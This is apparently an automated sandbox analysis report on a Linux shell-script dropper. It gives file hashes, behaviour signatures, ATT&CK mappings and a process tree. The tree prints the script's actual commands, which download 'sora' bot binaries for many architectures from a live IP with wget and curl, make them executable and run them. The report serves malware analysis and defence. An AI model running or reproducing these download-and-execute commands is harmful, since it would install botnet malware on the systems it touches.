Analysis
max time kernel: 14s
max time network: 15s
platform: debian-9_armhf
resource: debian9-armhf-20240611-en
resource tags: arch:armhf, image:debian9-armhf-20240611-en, kernel:4.9.0-13-armmp-lpae, locale:en-us, os:debian-9-armhf, system
submitted: 18/10/2024, 02:26
Static task: static1
Behavioral task: behavioral1
  Sample: a9414470152b889ecf7de35a5838e53ae2e945f48187b5c953cfd44ca4edfef8.sh
  Resource: ubuntu1804-amd64-20240508-en
Behavioral task: behavioral2
  Sample: a9414470152b889ecf7de35a5838e53ae2e945f48187b5c953cfd44ca4edfef8.sh
  Resource: debian9-armhf-20240611-en
Behavioral task: behavioral3
  Sample: a9414470152b889ecf7de35a5838e53ae2e945f48187b5c953cfd44ca4edfef8.sh
  Resource: debian9-mipsbe-20240418-en
Behavioral task: behavioral4
  Sample: a9414470152b889ecf7de35a5838e53ae2e945f48187b5c953cfd44ca4edfef8.sh
  Resource: debian9-mipsel-20240611-en
General
Target: a9414470152b889ecf7de35a5838e53ae2e945f48187b5c953cfd44ca4edfef8.sh
Size: 2KB
MD5: 1d363d0224de71500a06aaf7e205d0bb
SHA1: 13fe03fe502546c5b53e156db53090275844d2ba
SHA256: a9414470152b889ecf7de35a5838e53ae2e945f48187b5c953cfd44ca4edfef8
SHA512: 6030ceebdd5f6f16cbf10c1f30dfaf057d7f533dd156dc03c28c93920350407f5b3aebc4e09f2a74fdf2f155c7027001aed4d892ce0f83fb8b54b87a5212ddde
Malware Config
Signatures

File and Directory Permissions Modification 1 TTPs 14 IoCs
Adversaries may modify file or directory permissions to evade defenses.
pid  Process
703  chmod
780  chmod
817  chmod
829  chmod
750  chmod
690  chmod
716  chmod
757  chmod
799  chmod
835  chmod
674  chmod
811  chmod
823  chmod
805  chmod

Executes dropped EXE 14 IoCs
ioc          pid  Process
/tmp/robben  675  robben
/tmp/robben  691  robben
/tmp/robben  705  robben
/tmp/robben  717  robben
/tmp/robben  751  robben
/tmp/robben  758  robben
/tmp/robben  782  robben
/tmp/robben  800  robben
/tmp/robben  806  robben
/tmp/robben  812  robben
/tmp/robben  818  robben
/tmp/robben  824  robben
/tmp/robben  830  robben
/tmp/robben  836  robben

Checks CPU configuration 1 TTPs 14 IoCs
Checks CPU information, which can indicate whether the system is a virtual machine.
description              ioc            Process
File opened for reading  /proc/cpuinfo  curl
File opened for reading  /proc/cpuinfo  curl
File opened for reading  /proc/cpuinfo  curl
File opened for reading  /proc/cpuinfo  curl
File opened for reading  /proc/cpuinfo  curl
File opened for reading  /proc/cpuinfo  curl
File opened for reading  /proc/cpuinfo  curl
File opened for reading  /proc/cpuinfo  curl
File opened for reading  /proc/cpuinfo  curl
File opened for reading  /proc/cpuinfo  curl
File opened for reading  /proc/cpuinfo  curl
File opened for reading  /proc/cpuinfo  curl
File opened for reading  /proc/cpuinfo  curl
File opened for reading  /proc/cpuinfo  curl

Reads runtime system information 28 IoCs
description              ioc                            Process
File opened for reading  /proc/sys/crypto/fips_enabled  curl
File opened for reading  /proc/sys/crypto/fips_enabled  curl
File opened for reading  /proc/sys/crypto/fips_enabled  curl
File opened for reading  /proc/self/auxv                curl
File opened for reading  /proc/sys/crypto/fips_enabled  curl
File opened for reading  /proc/sys/crypto/fips_enabled  curl
File opened for reading  /proc/sys/crypto/fips_enabled  curl
File opened for reading  /proc/sys/crypto/fips_enabled  curl
File opened for reading  /proc/sys/crypto/fips_enabled  curl
File opened for reading  /proc/self/auxv                curl
File opened for reading  /proc/self/auxv                curl
File opened for reading  /proc/sys/crypto/fips_enabled  curl
File opened for reading  /proc/self/auxv                curl
File opened for reading  /proc/self/auxv                curl
File opened for reading  /proc/self/auxv                curl
File opened for reading  /proc/sys/crypto/fips_enabled  curl
File opened for reading  /proc/sys/crypto/fips_enabled  curl
File opened for reading  /proc/self/auxv                curl
File opened for reading  /proc/self/auxv                curl
File opened for reading  /proc/sys/crypto/fips_enabled  curl
File opened for reading  /proc/self/auxv                curl
File opened for reading  /proc/self/auxv                curl
File opened for reading  /proc/self/auxv                curl
File opened for reading  /proc/sys/crypto/fips_enabled  curl
File opened for reading  /proc/self/auxv                curl
File opened for reading  /proc/self/auxv                curl
File opened for reading  /proc/self/auxv                curl
File opened for reading  /proc/sys/crypto/fips_enabled  curl

System Network Configuration Discovery 1 TTPs 3 IoCs
Adversaries may gather information about the network configuration of a system.
pid  Process
677  wget
686  curl
688  cat

Writes file to tmp directory 1 IoCs
Malware often drops required files in the /tmp directory.
description                   ioc          Process
File opened for modification  /tmp/robben  a9414470152b889ecf7de35a5838e53ae2e945f48187b5c953cfd44ca4edfef8.sh
Processes
/tmp/a9414470152b889ecf7de35a5838e53ae2e945f48187b5c953cfd44ca4edfef8.sh
  command: /tmp/a9414470152b889ecf7de35a5838e53ae2e945f48187b5c953cfd44ca4edfef8.sh
  - Writes file to tmp directory
  PID: 649
    /usr/bin/wget
      command: wget http://93.123.85.141/bins/sora.x86
      PID: 652
    /usr/bin/curl
      command: curl -O http://93.123.85.141/bins/sora.x86
      - Checks CPU configuration
      - Reads runtime system information
      PID: 661
    /bin/cat
      command: cat sora.x86
      PID: 671
    /bin/chmod
      command: chmod +x a9414470152b889ecf7de35a5838e53ae2e945f48187b5c953cfd44ca4edfef8.sh robben systemd-private-aaea58b58de5438c837e984796459c2c-systemd-timedated.service-3thIem
      - File and Directory Permissions Modification
      PID: 674
    /tmp/robben
      command: ./robben lg.exploit
      - Executes dropped EXE
      PID: 675
    /usr/bin/wget
      command: wget http://93.123.85.141/bins/sora.mips
      - System Network Configuration Discovery
      PID: 677
    /usr/bin/curl
      command: curl -O http://93.123.85.141/bins/sora.mips
      - Checks CPU configuration
      - Reads runtime system information
      - System Network Configuration Discovery
      PID: 686
    /bin/cat
      command: cat sora.mips
      - System Network Configuration Discovery
      PID: 688
    /bin/chmod
      command: chmod +x a9414470152b889ecf7de35a5838e53ae2e945f48187b5c953cfd44ca4edfef8.sh robben systemd-private-aaea58b58de5438c837e984796459c2c-systemd-timedated.service-3thIem
      - File and Directory Permissions Modification
      PID: 690
    /tmp/robben
      command: ./robben lg.exploit
      - Executes dropped EXE
      PID: 691
    /usr/bin/wget
      command: wget http://93.123.85.141/bins/sora.x86_64
      PID: 693
    /usr/bin/curl
      command: curl -O http://93.123.85.141/bins/sora.x86_64
      - Checks CPU configuration
      - Reads runtime system information
      PID: 697
    /bin/cat
      command: cat sora.x86_64
      PID: 701
    /bin/chmod
      command: chmod +x a9414470152b889ecf7de35a5838e53ae2e945f48187b5c953cfd44ca4edfef8.sh robben systemd-private-aaea58b58de5438c837e984796459c2c-systemd-timedated.service-3thIem
      - File and Directory Permissions Modification
      PID: 703
    /tmp/robben
      command: ./robben lg.exploit
      - Executes dropped EXE
      PID: 705
    /usr/bin/wget
      command: wget http://93.123.85.141/bins/sora.i468
      PID: 707
    /usr/bin/curl
      command: curl -O http://93.123.85.141/bins/sora.i468
      - Checks CPU configuration
      - Reads runtime system information
      PID: 710
    /bin/cat
      command: cat sora.i468
      PID: 715
    /bin/chmod
      command: chmod +x a9414470152b889ecf7de35a5838e53ae2e945f48187b5c953cfd44ca4edfef8.sh robben systemd-private-aaea58b58de5438c837e984796459c2c-systemd-timedated.service-3thIem
      - File and Directory Permissions Modification
      PID: 716
    /tmp/robben
      command: ./robben lg.exploit
      - Executes dropped EXE
      PID: 717
    /usr/bin/wget
      command: wget http://93.123.85.141/bins/sora.i686
      PID: 720
    /usr/bin/curl
      command: curl -O http://93.123.85.141/bins/sora.i686
      - Checks CPU configuration
      - Reads runtime system information
      PID: 743
    /bin/cat
      command: cat sora.i686
      PID: 748
    /bin/chmod
      command: chmod +x a9414470152b889ecf7de35a5838e53ae2e945f48187b5c953cfd44ca4edfef8.sh robben systemd-private-aaea58b58de5438c837e984796459c2c-systemd-timedated.service-3thIem
      - File and Directory Permissions Modification
      PID: 750
    /tmp/robben
      command: ./robben lg.exploit
      - Executes dropped EXE
      PID: 751
    /usr/bin/wget
      command: wget http://93.123.85.141/bins/sora.mpsl
      PID: 753
    /usr/bin/curl
      command: curl -O http://93.123.85.141/bins/sora.mpsl
      - Checks CPU configuration
      - Reads runtime system information
      PID: 755
    /bin/cat
      command: cat sora.mpsl
      PID: 756
    /bin/chmod
      command: chmod +x a9414470152b889ecf7de35a5838e53ae2e945f48187b5c953cfd44ca4edfef8.sh robben systemd-private-aaea58b58de5438c837e984796459c2c-systemd-timedated.service-3thIem
      - File and Directory Permissions Modification
      PID: 757
    /tmp/robben
      command: ./robben lg.exploit
      - Executes dropped EXE
      PID: 758
    /usr/bin/wget
      command: wget http://93.123.85.141/bins/sora.arm4
      PID: 760
    /usr/bin/curl
      command: curl -O http://93.123.85.141/bins/sora.arm4
      - Checks CPU configuration
      - Reads runtime system information
      PID: 774
    /bin/cat
      command: cat sora.arm4
      PID: 778
    /bin/chmod
      command: chmod +x a9414470152b889ecf7de35a5838e53ae2e945f48187b5c953cfd44ca4edfef8.sh robben systemd-private-aaea58b58de5438c837e984796459c2c-systemd-timedated.service-3thIem
      - File and Directory Permissions Modification
      PID: 780
    /tmp/robben
      command: ./robben lg.exploit
      - Executes dropped EXE
      PID: 782
    /usr/bin/wget
      command: wget http://93.123.85.141/bins/sora.arm5
      PID: 784
    /usr/bin/curl
      command: curl -O http://93.123.85.141/bins/sora.arm5
      - Checks CPU configuration
      - Reads runtime system information
      PID: 797
    /bin/cat
      command: cat sora.arm5
      PID: 798
    /bin/chmod
      command: chmod +x a9414470152b889ecf7de35a5838e53ae2e945f48187b5c953cfd44ca4edfef8.sh robben systemd-private-aaea58b58de5438c837e984796459c2c-systemd-timedated.service-3thIem
      - File and Directory Permissions Modification
      PID: 799
    /tmp/robben
      command: ./robben lg.exploit
      - Executes dropped EXE
      PID: 800
    /usr/bin/wget
      command: wget http://93.123.85.141/bins/sora.arm6
      PID: 802
    /usr/bin/curl
      command: curl -O http://93.123.85.141/bins/sora.arm6
      - Checks CPU configuration
      - Reads runtime system information
      PID: 803
    /bin/cat
      command: cat sora.arm6
      PID: 804
    /bin/chmod
      command: chmod +x a9414470152b889ecf7de35a5838e53ae2e945f48187b5c953cfd44ca4edfef8.sh robben systemd-private-aaea58b58de5438c837e984796459c2c-systemd-timedated.service-3thIem
      - File and Directory Permissions Modification
      PID: 805
    /tmp/robben
      command: ./robben lg.exploit
      - Executes dropped EXE
      PID: 806
    /usr/bin/wget
      command: wget http://93.123.85.141/bins/sora.arm7
      PID: 808
    /usr/bin/curl
      command: curl -O http://93.123.85.141/bins/sora.arm7
      - Checks CPU configuration
      - Reads runtime system information
      PID: 809
    /bin/cat
      command: cat sora.arm7
      PID: 810
    /bin/chmod
      command: chmod +x a9414470152b889ecf7de35a5838e53ae2e945f48187b5c953cfd44ca4edfef8.sh robben systemd-private-aaea58b58de5438c837e984796459c2c-systemd-timedated.service-3thIem
      - File and Directory Permissions Modification
      PID: 811
    /tmp/robben
      command: ./robben lg.exploit
      - Executes dropped EXE
      PID: 812
    /usr/bin/wget
      command: wget http://93.123.85.141/bins/sora.ppc
      PID: 814
    /usr/bin/curl
      command: curl -O http://93.123.85.141/bins/sora.ppc
      - Checks CPU configuration
      - Reads runtime system information
      PID: 815
    /bin/cat
      command: cat sora.ppc
      PID: 816
    /bin/chmod
      command: chmod +x a9414470152b889ecf7de35a5838e53ae2e945f48187b5c953cfd44ca4edfef8.sh robben systemd-private-aaea58b58de5438c837e984796459c2c-systemd-timedated.service-3thIem
      - File and Directory Permissions Modification
      PID: 817
    /tmp/robben
      command: ./robben lg.exploit
      - Executes dropped EXE
      PID: 818
    /usr/bin/wget
      command: wget http://93.123.85.141/bins/sora.ppc440fp
      PID: 820
    /usr/bin/curl
      command: curl -O http://93.123.85.141/bins/sora.ppc440fp
      - Checks CPU configuration
      - Reads runtime system information
      PID: 821
    /bin/cat
      command: cat sora.ppc440fp
      PID: 822
    /bin/chmod
      command: chmod +x a9414470152b889ecf7de35a5838e53ae2e945f48187b5c953cfd44ca4edfef8.sh robben systemd-private-aaea58b58de5438c837e984796459c2c-systemd-timedated.service-3thIem
      - File and Directory Permissions Modification
      PID: 823
    /tmp/robben
      command: ./robben lg.exploit
      - Executes dropped EXE
      PID: 824
    /usr/bin/wget
      command: wget http://93.123.85.141/bins/sora.m68k
      PID: 826
    /usr/bin/curl
      command: curl -O http://93.123.85.141/bins/sora.m68k
      - Checks CPU configuration
      - Reads runtime system information
      PID: 827
    /bin/cat
      command: cat sora.m68k
      PID: 828
    /bin/chmod
      command: chmod +x a9414470152b889ecf7de35a5838e53ae2e945f48187b5c953cfd44ca4edfef8.sh robben systemd-private-aaea58b58de5438c837e984796459c2c-systemd-timedated.service-3thIem
      - File and Directory Permissions Modification
      PID: 829
    /tmp/robben
      command: ./robben lg.exploit
      - Executes dropped EXE
      PID: 830
    /usr/bin/wget
      command: wget http://93.123.85.141/bins/sora.sh4
      PID: 832
    /usr/bin/curl
      command: curl -O http://93.123.85.141/bins/sora.sh4
      - Checks CPU configuration
      - Reads runtime system information
      PID: 833
    /bin/cat
      command: cat sora.sh4
      PID: 834
    /bin/chmod
      command: chmod +x a9414470152b889ecf7de35a5838e53ae2e945f48187b5c953cfd44ca4edfef8.sh robben systemd-private-aaea58b58de5438c837e984796459c2c-systemd-timedated.service-3thIem
      - File and Directory Permissions Modification
      PID: 835
    /tmp/robben
      command: ./robben lg.exploit
      - Executes dropped EXE
      PID: 836
Network
MITRE ATT&CK Enterprise v15
Defense Evasion
  File and Directory Permissions Modification (1)
    Linux and Mac File and Directory Permissions Modification (1)
  Virtualization/Sandbox Evasion (1)
    System Checks (1)